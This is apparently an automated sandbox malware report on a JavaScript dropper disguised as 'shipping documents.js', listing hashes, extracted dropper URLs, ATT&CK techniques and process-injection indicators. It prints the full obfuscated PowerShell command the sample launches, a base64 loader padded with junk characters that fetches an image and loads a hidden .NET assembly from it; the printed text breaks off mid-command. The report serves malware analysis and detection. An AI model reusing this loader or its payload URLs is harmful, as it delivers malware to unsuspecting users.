45fc6967935f84f02714f9ac150f6c7ff75ca0c51b45a6816840e70cdd4e280b

General

Target

shipping documents.js
Size

671KB
MD5

81c64242c41cb08fb5128c12435a2158
SHA1

ca09545b9d458f8be936994f2a886fd62adb0a6b
SHA256

45fc6967935f84f02714f9ac150f6c7ff75ca0c51b45a6816840e70cdd4e280b
SHA512

55b22d2e13ab013efefff3a6ebb19089b97531ed6a6593df74994e1f946adfa84adee9aa488a0688ad7caa9f5cc38ac3a2e03919b524afb744f829186d07e995
SSDEEP

12288:ljglKDTe5LWuz7rFaXXSTIUqIb8avc9AFjIpu6gXyP4jrWJ9YjXZOETws6MpBj+j:+vq0Z6udjVEG6UILx

Score

10^/10

discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg

exe.dropper

https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2868	powershell.exe
6	2868	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2836	powershell.exe
2868	powershell.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2272	wscript.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2836	powershell.exe
2868	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2836	powershell.exe
Token: SeDebugPrivilege	2868	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2272 wrote to memory of 2836	2272	wscript.exe	30
PID 2272 wrote to memory of 2836	2272	wscript.exe	30
PID 2272 wrote to memory of 2836	2272	wscript.exe	30
PID 2836 wrote to memory of 2868	2836	powershell.exe	32
PID 2836 wrote to memory of 2868	2836	powershell.exe	32
PID 2836 wrote to memory of 2868	2836	powershell.exe	32

C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\AppData\Local\Temp\shipping documents.js"
1⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2272
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⼹ ↶ ㋓ ◺ ◍Bp⼹ ↶ ㋓ ◺ ◍G0⼹ ↶ ㋓ ◺ ◍YQBn⼹ ↶ ㋓ ◺ ◍GU⼹ ↶ ㋓ ◺ ◍VQBy⼹ ↶ ㋓ ◺ ◍Gw⼹ ↶ ㋓ ◺ ◍I⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍9⼹ ↶ ㋓ ◺ ◍C⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍JwBo⼹ ↶ ㋓ ◺ ◍HQ⼹ ↶ ㋓ ◺ ◍d⼹ ↶ ㋓ ◺ ◍Bw⼹ ↶ ㋓ ◺ ◍HM⼹ ↶ ㋓ ◺ ◍Og⼹ ↶ ㋓ ◺ ◍v⼹ ↶ ㋓ ◺ ◍C8⼹ ↶ ㋓ ◺ ◍aQBh⼹ ↶ ㋓ ◺ ◍DY⼹ ↶ ㋓ ◺ ◍M⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍x⼹ ↶ ㋓ ◺ ◍DY⼹ ↶ ㋓ ◺ ◍M⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍2⼹ ↶ ㋓ ◺ ◍C4⼹ ↶ ㋓ ◺ ◍dQBz⼹ ↶ ㋓ ◺ ◍C4⼹ ↶ ㋓ ◺ ◍YQBy⼹ ↶ ㋓ ◺ ◍GM⼹ ↶ ㋓ ◺ ◍a⼹ ↶ ㋓ ◺ ◍Bp⼹ ↶ ㋓ ◺ ◍HY⼹ ↶ ㋓ ◺ ◍ZQ⼹ ↶ ㋓ ◺ ◍u⼹ ↶ ㋓ ◺ ◍G8⼹ ↶ ㋓ ◺ ◍cgBn⼹ ↶ ㋓ ◺ ◍C8⼹ ↶ ㋓ ◺ ◍MQ⼹ ↶ ㋓ ◺ ◍w⼹ ↶ ㋓ ◺ ◍C8⼹ ↶ ㋓ ◺ ◍aQB0⼹ ↶ ㋓ ◺ ◍GU⼹ ↶ ㋓ ◺ ◍bQBz⼹ ↶ ㋓ ◺ ◍C8⼹ ↶ ㋓ ◺ ◍Z⼹ ↶ ㋓ ◺ ◍Bl⼹ ↶ ㋓ ◺ ◍GE⼹ ↶ ㋓ ◺ ◍d⼹ ↶ ㋓ ◺ ◍Bo⼹ ↶ ㋓ ◺ ◍G4⼹ ↶ ㋓ ◺ ◍bwB0⼹ ↶ ㋓ ◺ ◍GU⼹ ↶ ㋓ ◺ ◍Xw⼹ ↶ ㋓ ◺ ◍y⼹ ↶ ㋓ ◺ ◍D⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍Mg⼹ ↶ ㋓ ◺ ◍0⼹ ↶ ㋓ ◺ ◍D⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍Nw⼹ ↶ ㋓ ◺ ◍v⼹ ↶ ㋓ ◺ ◍GQ⼹ ↶ ㋓ ◺ ◍ZQBh⼹ ↶ ㋓ ◺ ◍HQ⼹ ↶ ㋓ ◺ ◍a⼹ ↶ ㋓ ◺ ◍Bu⼹ ↶ ㋓ ◺ ◍G8⼹ ↶ ㋓ ◺ ◍d⼹ ↶ ㋓ ◺ ◍Bl⼹ ↶ ㋓ ◺ ◍C4⼹ ↶ ㋓ ◺ ◍agBw⼹ ↶ ㋓ ◺ ◍Gc⼹ ↶ ㋓ ◺ ◍Jw⼹ ↶ ㋓ ◺ ◍7⼹ ↶ ㋓ ◺ ◍CQ⼹ ↶ ㋓ ◺ ◍dwBl⼹ ↶ ㋓ ◺ ◍GI⼹ ↶ ㋓ ◺ ◍QwBs⼹ ↶ ㋓ ◺ ◍Gk⼹ ↶ ㋓ ◺ ◍ZQBu⼹ ↶ ㋓ ◺ ◍HQ⼹ ↶ ㋓ ◺ ◍I⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍9⼹ ↶ ㋓ ◺ ◍C⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍TgBl⼹ ↶ ㋓ ◺ ◍Hc⼹ ↶ ㋓ ◺ ◍LQBP⼹ ↶ ㋓ ◺ ◍GI⼹ ↶ ㋓ ◺ ◍agBl⼹ ↶ ㋓ ◺ ◍GM⼹ ↶ ㋓ ◺ ◍d⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍g⼹ ↶ ㋓ ◺ ◍FM⼹ ↶ ㋓ ◺ ◍eQBz⼹ ↶ ㋓ ◺ ◍HQ⼹ ↶ ㋓ ◺ ◍ZQBt⼹ ↶ ㋓ ◺ ◍C4⼹ ↶ ㋓ ◺ ◍TgBl⼹ ↶ ㋓ ◺ ◍HQ⼹ ↶ ㋓ ◺ ◍LgBX⼹ ↶ ㋓ ◺ ◍GU⼹ ↶ ㋓ ◺ ◍YgBD⼹ ↶ ㋓ ◺ ◍Gw⼹ ↶ ㋓ ◺ ◍aQBl⼹ ↶ ㋓ ◺ ◍G4⼹ ↶ ㋓ ◺ ◍d⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍7⼹ ↶ ㋓ ◺ ◍CQ⼹ ↶ ㋓ ◺ ◍aQBt⼹ ↶ ㋓ ◺ ◍GE⼹ ↶ ㋓ ◺ ◍ZwBl⼹ ↶ ㋓ ◺ ◍EI⼹ ↶ ㋓ ◺ ◍eQB0⼹ ↶ ㋓ ◺ ◍GU⼹ ↶ ㋓ ◺ ◍cw⼹ ↶ ㋓ ◺ ◍g⼹ ↶ ㋓ ◺ ◍D0⼹ ↶ ㋓ ◺ ◍I⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍k⼹ ↶ ㋓ ◺ ◍Hc⼹ ↶ ㋓ ◺ ◍ZQBi⼹ ↶ ㋓ ◺ ◍EM⼹ ↶ ㋓ ◺ ◍b⼹ ↶ ㋓ ◺ ◍Bp⼹ ↶ ㋓ ◺ ◍GU⼹ ↶ ㋓ ◺ ◍bgB0⼹ ↶ ㋓ ◺ ◍C4⼹ ↶ ㋓ ◺ ◍R⼹ ↶ ㋓ ◺ ◍Bv⼹ ↶ ㋓ ◺ ◍Hc⼹ ↶ ㋓ ◺ ◍bgBs⼹ ↶ ㋓ ◺ ◍G8⼹ ↶ ㋓ ◺ ◍YQBk⼹ ↶ ㋓ ◺ ◍EQ⼹ ↶ ㋓ ◺ ◍YQB0⼹ ↶ ㋓ ◺ ◍GE⼹ ↶ ㋓ ◺ ◍K⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍k⼹ ↶ ㋓ ◺ ◍Gk⼹ ↶ ㋓ ◺ ◍bQBh⼹ ↶ ㋓ ◺ ◍Gc⼹ ↶ ㋓ ◺ ◍ZQBV⼹ ↶ ㋓ ◺ ◍HI⼹ ↶ ㋓ ◺ ◍b⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍p⼹ ↶ ㋓ ◺ ◍Ds⼹ ↶ ㋓ ◺ ◍J⼹ ↶ ㋓ ◺ ◍Bp⼹ ↶ ㋓ ◺ ◍G0⼹ ↶ ㋓ ◺ ◍YQBn⼹ ↶ ㋓ ◺ ◍GU⼹ ↶ ㋓ ◺ ◍V⼹ ↶ ㋓ ◺ ◍Bl⼹ ↶ ㋓ ◺ ◍Hg⼹ ↶ ㋓ ◺ ◍d⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍g⼹ ↶ ㋓ ◺ ◍D0⼹ ↶ ㋓ ◺ ◍I⼹ ↶ ㋓ ◺ ◍Bb⼹ ↶ ㋓ ◺ ◍FM⼹ ↶ ㋓ ◺ ◍eQBz⼹ ↶ ㋓ ◺ ◍HQ⼹ ↶ ㋓ ◺ ◍ZQBt⼹ ↶ ㋓ ◺ ◍C4⼹ ↶ ㋓ ◺ ◍V⼹ ↶ ㋓ ◺ ◍Bl⼹ ↶ ㋓ ◺ ◍Hg⼹ ↶ ㋓ ◺ ◍d⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍u⼹ ↶ ㋓ ◺ ◍EU⼹ ↶ ㋓ ◺ ◍bgBj⼹ ↶ ㋓ ◺ ◍G8⼹ ↶ ㋓ ◺ ◍Z⼹ ↶ ㋓ ◺ ◍Bp⼹ ↶ ㋓ ◺ ◍G4⼹ ↶ ㋓ ◺ ◍ZwBd⼹ ↶ ㋓ ◺ ◍Do⼹ ↶ ㋓ ◺ ◍OgBV⼹ ↶ ㋓ ◺ ◍FQ⼹ ↶ ㋓ ◺ ◍Rg⼹ ↶ ㋓ ◺ ◍4⼹ ↶ ㋓ ◺ ◍C4⼹ ↶ ㋓ ◺ ◍RwBl⼹ ↶ ㋓ ◺ ◍HQ⼹ ↶ ㋓ ◺ ◍UwB0⼹ ↶ ㋓ ◺ ◍HI⼹ ↶ ㋓ ◺ ◍aQBu⼹ ↶ ㋓ ◺ ◍Gc⼹ ↶ ㋓ ◺ ◍K⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍k⼹ ↶ ㋓ ◺ ◍Gk⼹ ↶ ㋓ ◺ ◍bQBh⼹ ↶ ㋓ ◺ ◍Gc⼹ ↶ ㋓ ◺ ◍ZQBC⼹ ↶ ㋓ ◺ ◍Hk⼹ ↶ ㋓ ◺ ◍d⼹ ↶ ㋓ ◺ ◍Bl⼹ ↶ ㋓ ◺ ◍HM⼹ ↶ ㋓ ◺ ◍KQ⼹ ↶ ㋓ ◺ ◍7⼹ ↶ ㋓ ◺ ◍CQ⼹ ↶ ㋓ ◺ ◍cwB0⼹ ↶ ㋓ ◺ ◍GE⼹ ↶ ㋓ ◺ ◍cgB0⼹ ↶ ㋓ ◺ ◍EY⼹ ↶ ㋓ ◺ ◍b⼹ ↶ ㋓ ◺ ◍Bh⼹ ↶ ㋓ ◺ ◍Gc⼹ ↶ ㋓ ◺ ◍I⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍9⼹ ↶ ㋓ ◺ ◍C⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍Jw⼹ ↶ ㋓ ◺ ◍8⼹ ↶ ㋓ ◺ ◍Dw⼹ ↶ ㋓ ◺ ◍QgBB⼹ ↶ ㋓ ◺ ◍FM⼹ ↶ ㋓ ◺ ◍RQ⼹ ↶ ㋓ ◺ ◍2⼹ ↶ ㋓ ◺ ◍DQ⼹ ↶ ㋓ ◺ ◍XwBT⼹ ↶ ㋓ ◺ ◍FQ⼹ ↶ ㋓ ◺ ◍QQBS⼹ ↶ ㋓ ◺ ◍FQ⼹ ↶ ㋓ ◺ ◍Pg⼹ ↶ ㋓ ◺ ◍+⼹ ↶ ㋓ ◺ ◍Cc⼹ ↶ ㋓ ◺ ◍Ow⼹ ↶ ㋓ ◺ ◍k⼹ ↶ ㋓ ◺ ◍GU⼹ ↶ ㋓ ◺ ◍bgBk⼹ ↶ ㋓ ◺ ◍EY⼹ ↶ ㋓ ◺ ◍b⼹ ↶ ㋓ ◺ ◍Bh⼹ ↶ ㋓ ◺ ◍Gc⼹ ↶ ㋓ ◺ ◍I⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍9⼹ ↶ ㋓ ◺ ◍C⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍Jw⼹ ↶ ㋓ ◺ ◍8⼹ ↶ ㋓ ◺ ◍Dw⼹ ↶ ㋓ ◺ ◍QgBB⼹ ↶ ㋓ ◺ ◍FM⼹ ↶ ㋓ ◺ ◍RQ⼹ ↶ ㋓ ◺ ◍2⼹ ↶ ㋓ ◺ ◍DQ⼹ ↶ ㋓ ◺ ◍XwBF⼹ ↶ ㋓ ◺ ◍E4⼹ ↶ ㋓ ◺ ◍R⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍+⼹ ↶ ㋓ ◺ ◍D4⼹ ↶ ㋓ ◺ ◍Jw⼹ ↶ ㋓ ◺ ◍7⼹ ↶ ㋓ ◺ ◍CQ⼹ ↶ ㋓ ◺ ◍cwB0⼹ ↶ ㋓ ◺ ◍GE⼹ ↶ ㋓ ◺ ◍cgB0⼹ ↶ ㋓ ◺ ◍Ek⼹ ↶ ㋓ ◺ ◍bgBk⼹ ↶ ㋓ ◺ ◍GU⼹ ↶ ㋓ ◺ ◍e⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍g⼹ ↶ ㋓ ◺ ◍D0⼹ ↶ ㋓ ◺ ◍I⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍k⼹ ↶ ㋓ ◺ ◍Gk⼹ ↶ ㋓ ◺ ◍bQBh⼹ ↶ ㋓ ◺ ◍Gc⼹ ↶ ㋓ ◺ ◍ZQBU⼹ ↶ ㋓ ◺ ◍GU⼹ ↶ ㋓ ◺ ◍e⼹ ↶ ㋓ ◺ ◍B0⼹ ↶ ㋓ ◺ ◍C4⼹ ↶ ㋓ ◺ ◍SQBu⼹ ↶ ㋓ ◺ ◍GQ⼹ ↶ ㋓ ◺ ◍ZQB4⼹ ↶ ㋓ ◺ ◍E8⼹ ↶ ㋓ ◺ ◍Zg⼹ ↶ ㋓ ◺ ◍o⼹ ↶ ㋓ ◺ ◍CQ⼹ ↶ ㋓ ◺ ◍cwB0⼹ ↶ ㋓ ◺ ◍GE⼹ ↶ ㋓ ◺ ◍cgB0⼹ ↶ ㋓ ◺ ◍EY⼹ ↶ ㋓ ◺ ◍b⼹ ↶ ㋓ ◺ ◍Bh⼹ ↶ ㋓ ◺ ◍Gc⼹ ↶ ㋓ ◺ ◍KQ⼹ ↶ ㋓ ◺ ◍7⼹ ↶ ㋓ ◺ ◍CQ⼹ ↶ ㋓ ◺ ◍ZQBu⼹ ↶ ㋓ ◺ ◍GQ⼹ ↶ ㋓ ◺ ◍SQBu⼹ ↶ ㋓ ◺ ◍GQ⼹ ↶ ㋓ ◺ ◍ZQB4⼹ ↶ ㋓ ◺ ◍C⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍PQ⼹ ↶ ㋓ ◺ ◍g⼹ ↶ ㋓ ◺ ◍CQ⼹ ↶ ㋓ ◺ ◍aQBt⼹ ↶ ㋓ ◺ ◍GE⼹ ↶ ㋓ ◺ ◍ZwBl⼹ ↶ ㋓ ◺ ◍FQ⼹ ↶ ㋓ ◺ ◍ZQB4⼹ ↶ ㋓ ◺ ◍HQ⼹ ↶ ㋓ ◺ ◍LgBJ⼹ ↶ ㋓ ◺ ◍G4⼹ ↶ ㋓ ◺ ◍Z⼹ ↶ ㋓ ◺ ◍Bl⼹ ↶ ㋓ ◺ ◍Hg⼹ ↶ ㋓ ◺ ◍TwBm⼹ ↶ ㋓ ◺ ◍Cg⼹ ↶ ㋓ ◺ ◍J⼹ ↶ ㋓ ◺ ◍Bl⼹ ↶ ㋓ ◺ ◍G4⼹ ↶ ㋓ ◺ ◍Z⼹ ↶ ㋓ ◺ ◍BG⼹ ↶ ㋓ ◺ ◍Gw⼹ ↶ ㋓ ◺ ◍YQBn⼹ ↶ ㋓ ◺ ◍Ck⼹ ↶ ㋓ ◺ ◍Ow⼹ ↶ ㋓ ◺ ◍k⼹ ↶ ㋓ ◺ ◍HM⼹ ↶ ㋓ ◺ ◍d⼹ ↶ ㋓ ◺ ◍Bh⼹ ↶ ㋓ ◺ ◍HI⼹ ↶ ㋓ ◺ ◍d⼹ ↶ ㋓ ◺ ◍BJ⼹ ↶ ㋓ ◺ ◍G4⼹ ↶ ㋓ ◺ ◍Z⼹ ↶ ㋓ ◺ ◍Bl⼹ ↶ ㋓ ◺ ◍Hg⼹ ↶ ㋓ ◺ ◍I⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍t⼹ ↶ ㋓ ◺ ◍Gc⼹ ↶ ㋓ ◺ ◍ZQ⼹ ↶ ㋓ ◺ ◍g⼹ ↶ ㋓ ◺ ◍D⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍I⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍t⼹ ↶ ㋓ ◺ ◍GE⼹ ↶ ㋓ ◺ ◍bgBk⼹ ↶ ㋓ ◺ ◍C⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍J⼹ ↶ ㋓ ◺ ◍Bl⼹ ↶ ㋓ ◺ ◍G4⼹ ↶ ㋓ ◺ ◍Z⼹ ↶ ㋓ ◺ ◍BJ⼹ ↶ ㋓ ◺ ◍G4⼹ ↶ ㋓ ◺ ◍Z⼹ ↶ ㋓ ◺ ◍Bl⼹ ↶ ㋓ ◺ ◍Hg⼹ ↶ ㋓ ◺ ◍I⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍t⼹ ↶ ㋓ ◺ ◍Gc⼹ ↶ ㋓ ◺ ◍d⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍g⼹ ↶ ㋓ ◺ ◍CQ⼹ ↶ ㋓ ◺ ◍cwB0⼹ ↶ ㋓ ◺ ◍GE⼹ ↶ ㋓ ◺ ◍cgB0⼹ ↶ ㋓ ◺ ◍Ek⼹ ↶ ㋓ ◺ ◍bgBk⼹ ↶ ㋓ ◺ ◍GU⼹ ↶ ㋓ ◺ ◍e⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍7⼹ ↶ ㋓ ◺ ◍CQ⼹ ↶ ㋓ ◺ ◍cwB0⼹ ↶ ㋓ ◺ ◍GE⼹ ↶ ㋓ ◺ ◍cgB0⼹ ↶ ㋓ ◺ ◍Ek⼹ ↶ ㋓ ◺ ◍bgBk⼹ ↶ ㋓ ◺ ◍GU⼹ ↶ ㋓ ◺ ◍e⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍g⼹ ↶ ㋓ ◺ ◍Cs⼹ ↶ ㋓ ◺ ◍PQ⼹ ↶ ㋓ ◺ ◍g⼹ ↶ ㋓ ◺ ◍CQ⼹ ↶ ㋓ ◺ ◍cwB0⼹ ↶ ㋓ ◺ ◍GE⼹ ↶ ㋓ ◺ ◍cgB0⼹ ↶ ㋓ ◺ ◍EY⼹ ↶ ㋓ ◺ ◍b⼹ ↶ ㋓ ◺ ◍Bh⼹ ↶ ㋓ ◺ ◍Gc⼹ ↶ ㋓ ◺ ◍LgBM⼹ ↶ ㋓ ◺ ◍GU⼹ ↶ ㋓ ◺ ◍bgBn⼹ ↶ ㋓ ◺ ◍HQ⼹ ↶ ㋓ ◺ ◍a⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍7⼹ ↶ ㋓ ◺ ◍CQ⼹ ↶ ㋓ ◺ ◍YgBh⼹ ↶ ㋓ ◺ ◍HM⼹ ↶ ㋓ ◺ ◍ZQ⼹ ↶ ㋓ ◺ ◍2⼹ ↶ ㋓ ◺ ◍DQ⼹ ↶ ㋓ ◺ ◍T⼹ ↶ ㋓ ◺ ◍Bl⼹ ↶ ㋓ ◺ ◍G4⼹ ↶ ㋓ ◺ ◍ZwB0⼹ ↶ ㋓ ◺ ◍Gg⼹ ↶ ㋓ ◺ ◍I⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍9⼹ ↶ ㋓ ◺ ◍C⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍J⼹ ↶ ㋓ ◺ ◍Bl⼹ ↶ ㋓ ◺ ◍G4⼹ ↶ ㋓ ◺ ◍Z⼹ ↶ ㋓ ◺ ◍BJ⼹ ↶ ㋓ ◺ ◍G4⼹ ↶ ㋓ ◺ ◍Z⼹ ↶ ㋓ ◺ ◍Bl⼹ ↶ ㋓ ◺ ◍Hg⼹ ↶ ㋓ ◺ ◍I⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍t⼹ ↶ ㋓ ◺ ◍C⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍J⼹ ↶ ㋓ ◺ ◍Bz⼹ ↶ ㋓ ◺ ◍HQ⼹ ↶ ㋓ ◺ ◍YQBy⼹ ↶ ㋓ ◺ ◍HQ⼹ ↶ ㋓ ◺ ◍SQBu⼹ ↶ ㋓ ◺ ◍GQ⼹ ↶ ㋓ ◺ ◍ZQB4⼹ ↶ ㋓ ◺ ◍Ds⼹ ↶ ㋓ ◺ ◍J⼹ ↶ ㋓ ◺ ◍Bi⼹ ↶ ㋓ ◺ ◍GE⼹ ↶ ㋓ ◺ ◍cwBl⼹ ↶ ㋓ ◺ ◍DY⼹ ↶ ㋓ ◺ ◍N⼹ ↶ ㋓ ◺ ◍BD⼹ ↶ ㋓ ◺ ◍G8⼹ ↶ ㋓ ◺ ◍bQBt⼹ ↶ ㋓ ◺ ◍GE⼹ ↶ ㋓ ◺ ◍bgBk⼹ ↶ ㋓ ◺ ◍C⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍PQ⼹ ↶ ㋓ ◺ ◍g⼹ ↶ ㋓ ◺ ◍CQ⼹ ↶ ㋓ ◺ ◍aQBt⼹ ↶ ㋓ ◺ ◍GE⼹ ↶ ㋓ ◺ ◍ZwBl⼹ ↶ ㋓ ◺ ◍FQ⼹ ↶ ㋓ ◺ ◍ZQB4⼹ ↶ ㋓ ◺ ◍HQ⼹ ↶ ㋓ ◺ ◍LgBT⼹ ↶ ㋓ ◺ ◍HU⼹ ↶ ㋓ ◺ ◍YgBz⼹ ↶ ㋓ ◺ ◍HQ⼹ ↶ ㋓ ◺ ◍cgBp⼹ ↶ ㋓ ◺ ◍G4⼹ ↶ ㋓ ◺ ◍Zw⼹ ↶ ㋓ ◺ ◍o⼹ ↶ ㋓ ◺ ◍CQ⼹ ↶ ㋓ ◺ ◍cwB0⼹ ↶ ㋓ ◺ ◍GE⼹ ↶ ㋓ ◺ ◍cgB0⼹ ↶ ㋓ ◺ ◍Ek⼹ ↶ ㋓ ◺ ◍bgBk⼹ ↶ ㋓ ◺ ◍GU⼹ ↶ ㋓ ◺ ◍e⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍s⼹ ↶ ㋓ ◺ ◍C⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍J⼹ ↶ ㋓ ◺ ◍Bi⼹ ↶ ㋓ ◺ ◍GE⼹ ↶ ㋓ ◺ ◍cwBl⼹ ↶ ㋓ ◺ ◍DY⼹ ↶ ㋓ ◺ ◍N⼹ ↶ ㋓ ◺ ◍BM⼹ ↶ ㋓ ◺ ◍GU⼹ ↶ ㋓ ◺ ◍bgBn⼹ ↶ ㋓ ◺ ◍HQ⼹ ↶ ㋓ ◺ ◍a⼹ ↶ ㋓ ◺ ◍⼹ ↶ ㋓ ◺ ◍p⼹ ↶ ㋓ ◺ ◍Ds⼹ ↶ ㋓ ◺ ◍J⼹ ↶ ㋓ ◺ ◍Bj⼹ ↶ ㋓ ◺ ◍G8⼹ ↶ ㋓ ◺ ◍bQBt⼹ ↶ ㋓ ◺ ◍GE⼹ ↶ ㋓ ◺ ◍bgBk⼹ ↶ ㋓ ◺ ◍EI⼹ ↶ ㋓ ◺ ◍eQB0⼹ ↶ ㋓ ◺ ◍GU⼹ ↶ ㋓ ◺ ◍cw⼹ ↶ ㋓ ◺ ◍g⼹ ↶ ㋓ ◺ ◍D0⼹ ↶ ㋓ ◺ ◍I⼹ ↶ ㋓ ◺ ◍Bb⼹ ↶ ㋓ ◺ ◍FM⼹ ↶ ㋓ ◺ ◍eQBz⼹ ↶ ㋓ ◺ ◍HQ⼹ ↶ ㋓ ◺ ◍ZQBt⼹ ↶ ㋓ ◺ ◍C4⼹ ↶ ㋓ ◺ ◍QwBv⼹ ↶ ㋓ ◺ ◍G4⼹ ↶ ㋓ ◺ ◍dgBl⼹ ↶ ㋓ ◺ ◍HI⼹ ↶ ㋓ ◺ ◍d⼹ ↶ ㋓ ◺ ◍Bd⼹ ↶ ㋓ ◺ ◍Do⼹ ↶ ㋓ ◺ ◍OgBG⼹ ↶ ㋓ ◺ ◍HI⼹ ↶ ㋓ ◺ ◍bwBt⼹ ↶ ㋓ ◺ ◍EI⼹ ↶ ㋓ ◺ ◍YQBz⼹ ↶ ㋓ ◺ ◍GU⼹ ↶ ㋓ ◺ ◍Ng⼹ ↶ ㋓ ◺ ◍0⼹ ↶ ㋓ ◺ ◍FM⼹ ↶ ㋓ ◺ ◍d⼹ ↶ ㋓ ◺ ◍By⼹ ↶ ㋓ ◺ ◍Gk⼹ ↶ ㋓ ◺ ◍bgBn⼹ ↶ ㋓ ◺ ◍Cg⼹ ↶ ㋓ ◺ ◍J⼹ ↶ ㋓ ◺ ◍Bi⼹ ↶ ㋓ ◺ ◍GE⼹ ↶ ㋓ ◺ ◍cwBl⼹ ↶ ㋓ ◺ ◍DY⼹ ↶ ㋓ ◺ ◍N⼹ ↶ ㋓ ◺ ◍BD⼹ ↶ ㋓ ◺ ◍G8⼹ ↶ ㋓ ◺ ◍bQBt⼹ ↶ ㋓ ◺ ◍GE⼹ ↶ ㋓ ◺ ◍bgBk⼹ ↶ ㋓ ◺ ◍Ck⼹ ↶ ㋓ ◺ ◍Ow⼹ ↶ ㋓ ◺ ◍k⼹ ↶ ㋓ ◺ ◍Gw⼹ ↶ ㋓ ◺ ◍bwBh⼹ ↶ ㋓ ◺ ◍GQ⼹ ↶ ㋓ ◺ ◍ZQBk⼹ ↶ ㋓ ◺ ◍EE⼹ ↶ ㋓ ◺ ◍cwBz⼹ ↶ ㋓ ◺ ◍GU⼹ ↶ ㋓ ◺ ◍bQBi⼹ ↶ ㋓ ◺ ◍Gw⼹ ↶ ㋓ ◺ ◍eQ⼹ ↶ ㋓ ◺ ◍g⼹ ↶ ㋓ ◺ ◍D0⼹ ↶ ㋓ ◺ ◍I⼹ ↶ ㋓ ◺ ◍Bb⼹ ↶ ㋓ ◺ ◍FM⼹ ↶ ㋓ ◺ ◍eQBz⼹ ↶ ㋓ ◺ ◍HQ⼹ ↶ ㋓ ◺ ◍ZQBt⼹ ↶ ㋓ ◺ ◍C4⼹ ↶ ㋓ ◺ ◍UgBl⼹ ↶ ㋓ ◺ ◍GY⼹ ↶ ㋓ ◺ ◍b⼹ ↶ ㋓ ◺ ◍Bl⼹ ↶ ㋓ ◺ ◍GM⼹ ↶ ㋓ ◺ ◍d⼹ ↶ ㋓ ◺ ◍Bp⼹ ↶ ㋓ ◺ ◍G8⼹ ↶ ㋓ ◺ ◍bg⼹ ↶ ㋓ ◺ ◍u⼹ ↶ ㋓ ◺ ◍EE⼹ ↶ ㋓ ◺ ◍cwBz⼹ ↶ ㋓ ◺ ◍GU⼹ ↶ ㋓ ◺ ◍bQBi⼹ ↶ ㋓ ◺ ◍Gw⼹ ↶ ㋓ ◺ ◍eQBd⼹ ↶ ㋓ ◺ ◍Do⼹ ↶ ㋓ ◺ ◍OgBM⼹ ↶ ㋓ ◺ ◍G8⼹ ↶ ㋓ ◺ 